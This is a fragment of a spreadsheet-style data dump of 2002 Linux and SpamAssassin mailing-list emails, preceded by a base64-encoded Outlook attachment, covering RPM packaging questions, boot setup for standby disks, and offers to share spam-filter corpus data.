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 U4AIIAYAAAAAAMAAAAAAAABGAAAAAAGFAAAAAAAAAgH4DwEAAAAQAAAAp2s48mMWVEy0NPc3EPql 7wIB+g8BAAAAEAAAAKdrOPJjFlRMtDT3NxD6pe8CAfsPAQAAAKUAAAAAAAAAOKG7EAXlEBqhuwgA KypWwgAAUFNUUFJYLkRMTAAAAAAAAAAATklUQfm/uAEAqgA32W4AAABDOlxEb2N1bWVudHMgYW5k IFNldHRpbmdzXEFkbWluaXN0cmF09nJcTG9rYWxhIGluc3TkbGxuaW5nYXJcQXBwbGljYXRpb24g RGF0YVxNaWNyb3NvZnRcT3V0bG9va1xvdXRsb29rLnBzdAAAAAADAP4PBQAAAAMADTT9NwAAAgF/ AAEAAAAuAAAAPEZFRU1MRURFRkFGTUNJQUlNR1BKR0VOUENDQUEubWFuZ3JvQGhvbWUuc2U+AAAA AwAGEK7BhA0DAAcQewEAAAMAEBAAAAAAAwAREAAAAAAeAAgQAQAAAGUAAABJV09VTERMSUtFVE9J TlNUQUxMUlBNSVRTRUxGSUhBVkVUUklFRFRPR0VUVEhFSU5GT1JNQVRJT05CWVZJU0lUSU5HV1dX UlBNT1JHPEhUVFA6Ly9XV1dSUE1PUkdBTkRUSEVSAAAAAIGM ------=_NextPart_000_0002_01C23817.94245ED0-- _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>www.rpm.org http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Harri Haataja &lt;harri.haataja@cs.helsinki.fi&gt;\nDate: Tue, 30 Jul 2002 19:53:59 +0300</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 19:53:59 +0300</t>
  </si>
  <si>
    <t>Re: req: Falcon's eye</t>
  </si>
  <si>
    <t>On Tue, Jul 30, 2002 at 12:17:21AM +0300, Ville Skytt wrote: &gt; On Fri, 2002-07-26 at 12:52, Harri Haataja wrote: &gt; &gt; Another thing I see in debian but not in my RH boxen. &gt; &gt; [URL]http://falconseye.sourceforge.net[/URL] &gt; &gt; It's a GL(?) interface to nethack :) &gt; Take a look at , I have RPMs for RH7.3 &gt; there, based on (and compatible with) the NH3.x that last appeared in &gt; RH7.1 powertools.  apt'able, of course :) And Text-Iconv too, nice :) Gpg key is nowhere in sight though even while vendors.list lists key id's. --  &lt;@zomby[tm]&gt; tea is just like noodle soup without noodles _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://falconseye.sourceforge.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Ronan Cunniffe &lt;ronan@cunniffe.net&gt;\nDate: Tue, 30 Jul 2002 19:35:20 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 19:35:20 +0100</t>
  </si>
  <si>
    <t>Quoting Niall O Broin : &gt; I'm installing warm standby disks on a number of boxes. These disks will be &gt; the same size (sometimes bigger) than the main disk. The idea is that every &gt; night I'll rsync the partitions on the main disk to the standby disk so &gt; that &gt; in the case of disaster, the first port of call, before the tapes, is the &gt; standby disk. (We did consider running Linux md RAID on the disks but RAID &gt; gives you no protection against slips of the finger) Do I get beaten round the head for saying "floppy"? Assuming the machines are networked, let each one send a copy of its kernel to the others.  If the drives are open-the-box-and-switch-cables, then you can start dd'ing a floppy before you start.  If the drives are in drawers, then this might slow you down by all of 60 seconds. Alternatively, you could use netboot.  No, I'm serious.  Set the boot sequence to first hard disk then network.  Do NOT make any partition on the standby active.  Have a look at the etherboot package.  One of the things it contains is a pascal-ish language for writing boot menus.  You can write a one-liner that basically says "boot /dev/hda1" (or whatever, there's example code).  IIRC, the resulting "bootable image" is a whopping 4K.  The downside is you'll need a bootp and tftp server somewhere.... hth, Ronan. --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: SpamAssassin-devel@example.sourceforge.net\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Tue, 30 Jul 2002 18:29:03 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 18:29:03 +0100</t>
  </si>
  <si>
    <t>[SAdev] Alternatives to the GA</t>
  </si>
  <si>
    <t>BTW Ken Shan suggested making a set of corpus data publically available,\nso that different classification algos can be tried out.\n\nI'd be happy to do that -- providing the nonspam.log and spam.log files\nfrom my mass-check output (ie. the "matrix of test results" in Ken's\nterms).  Along with the default scores, this is the entire input data set\nfor the SpamAssassin GA system.\n\nSo, if anyone wants a go, contact me by mail.\n\n--j.\n\n-- \n'Justin Mason' =&gt; { url =&gt; [URL]http://jmason.org[/URL] , blog =&gt; [URL]http://taint.org[/URL] }\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: Dice - The leading online job board\nfor high-tech professionals. Search and apply for tech jobs today!\n[URL]http://seeker.dice.com[/URL]\n_______________________________________________\nSpamassassin-devel mailing list\nSpamassassin-devel@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://jmason.org http://taint.org http://seeker.dice.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Ralf Ertzinger &lt;ralf@camperquake.de&gt;\nDate: Tue, 30 Jul 2002 17:00:21 +0200</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 17:00:21 +0200</t>
  </si>
  <si>
    <t>Re: building as non-root / newbie question</t>
  </si>
  <si>
    <t>Hi. "Kevin Worthington"  wrote: &gt; into /home/dude/redhat etc. by running &gt; #rpm -ivh foo.src.rpm Do this: echo "%_topdir /home/dude/redhat" &gt;&gt; /home/dude/.rpmmacros and make sure the directory structure (RPMS, SOURCES, SPECS, SRPMS, BUILD) is there. --  R! _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Niall O Broin &lt;niall@linux.ie&gt;, ilug@linux.ie\nFrom: =?iso-8859-1?Q?Colm_MacC=E1rthaigh?= &lt;colmmacc@redbrick.dcu.ie&gt;\nDate: Tue, 30 Jul 2002 15:53:35 +0100</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 15:53:35 +0100</t>
  </si>
  <si>
    <t>=?iso-8859-1?Q?Colm_MacC=E1rthaigh?= &lt;colmmacc@redbrick.dcu.ie&gt;</t>
  </si>
  <si>
    <t>Niall O Broin &lt;niall@linux.ie&gt;, ilug@linux.ie</t>
  </si>
  <si>
    <t>On Tue, Jul 30, 2002 at 03:47:40PM +0100, Niall O Broin wrote:\n&gt; I'm installing warm standby disks on a number of boxes. These disks will be\n&gt; the same size (sometimes bigger) than the main disk. The idea is that every\n&gt; night I'll rsync the partitions on the main disk to the standby disk so that\n&gt; in the case of disaster, the first port of call, before the tapes, is the\n&gt; standby disk. (We did consider running Linux md RAID on the disks but RAID\n&gt; gives you no protection against slips of the finger)\n\nactually, on a related note, has anyone tried snapfs ?\n\n&gt; Unfortunately suck and it and see is rather tricky - the machines concerned\n&gt; are not to hand.\n\njust keep root as hda, you can change boot all you want, that's\nwhere it will get written when you run lilo from the prompt.\njust have a sane lilo.conf (with root=/dev/hda) and use lilo -b\nto write to different devices.\n\n-- \ncolmmacc@redbrick.dcu.ie        PubKey: colmmacc+pgp@redbrick.dcu.ie  \nWeb:                                 [URL]http://devnull.redbrick.dcu.ie[/URL] \n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://devnull.redbrick.dcu.ie http://www.linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Tue, 30 Jul 2002 15:53:11 -0500</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 15:53:11 -0500</t>
  </si>
  <si>
    <t>On Tue, 30 Jul 2002 22:22:24 +0200, "Manfred Grobosch"  wrote: &gt; I would like to install RPM itself. I have tried to get the information by &gt; visiting [URL]www.rpm.org[/URL]   and the related links they give &gt; but they all seems to assume that RPM already is installed. &gt; I have a firewall based on linux-2.2.20 (Smoothwall) for private use. &gt; I would like to install the RPM package/program but there is no information &gt; how to do this from scratch. &gt; Found this site and hopefully some have the knowledge.     Well, if you have a Windows, SCO, or AIX box, (generally anything BUT Redhat Linux) that'd be the site I'd send you to, to get it installed.  I've been there for the same reason, under SCO.  Maybe you missed something?     What OS are you running, anyway?    ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ I don't want to hear news from Isreal until the news contains the words "Bullet", "Brain", and "Arafat". _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>www.rpm.org http://www.CounterMoon.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: Irish LUG &lt;ilug@linux.ie&gt;\nFrom: David Neary &lt;dneary@wanadoo.fr&gt;\nDate: Tue, 30 Jul 2002 14:33:11 +0200</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 14:33:11 +0200</t>
  </si>
  <si>
    <t>Patton, Tony wrote: &gt; On Tue, 2002-07-30 at 10:06, Donncha O Caoimh wrote: &gt; &gt; Ar mhaith le einne anseo caint le TG4 faoin LBW? &gt; &gt;  &gt; &gt; Donncha. &gt; &gt;  &gt;  &gt; ----8&lt; &gt;  &gt; &gt; T m ag danamh taighde don clr teilifse An Tuath Nua (a bhonn  &gt; &gt; chraoladh ar TG4) faoi lthair, agus chonaic m go mbedih an Linux Beer &gt; &gt; Hike ar sil i Doolin i mbliana. Bheadh spis againn mr a dhanamh mar &gt; &gt; gheall ar an Hike ar an gclr - an mbeidh t fin n aon duine eile le &gt; &gt; Gaeilge ar an Hike go bhfios duit? &gt; &gt;  &gt; &gt; Go raibh maith agat as do chabhair, &gt; &gt;  &gt;  &gt; ----&gt;8 &gt;  &gt; Can someone translate this for me? Lost all sense of Irish when moved &gt; over the border about 10 years ago. Not by choice mind you :-( In short, "I'm involved in making a TV program "The New Road" (which will be on TG4) at the moment, and I saw that there'll be a Linux Beer Hike in Doolin this year. We'd be delighted to do a report about the hike for the programme - will yourself or anyone else with Irish be on the hike? Thanks for the help, A chara, Dave. --         David Neary,     Marseille, France   E-Mail: bolsh@gimp.org --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Justin Mason" &lt;yyyy@spamassassin.taint.org&gt;\nFrom: "rODbegbie" &lt;rOD@arsecandle.org&gt;\nDate: Tue, 30 Jul 2002 13:36:06 -0400</t>
  </si>
  <si>
    <t>Tue, 30 Jul 2002 13:36:06 -0400</t>
  </si>
  <si>
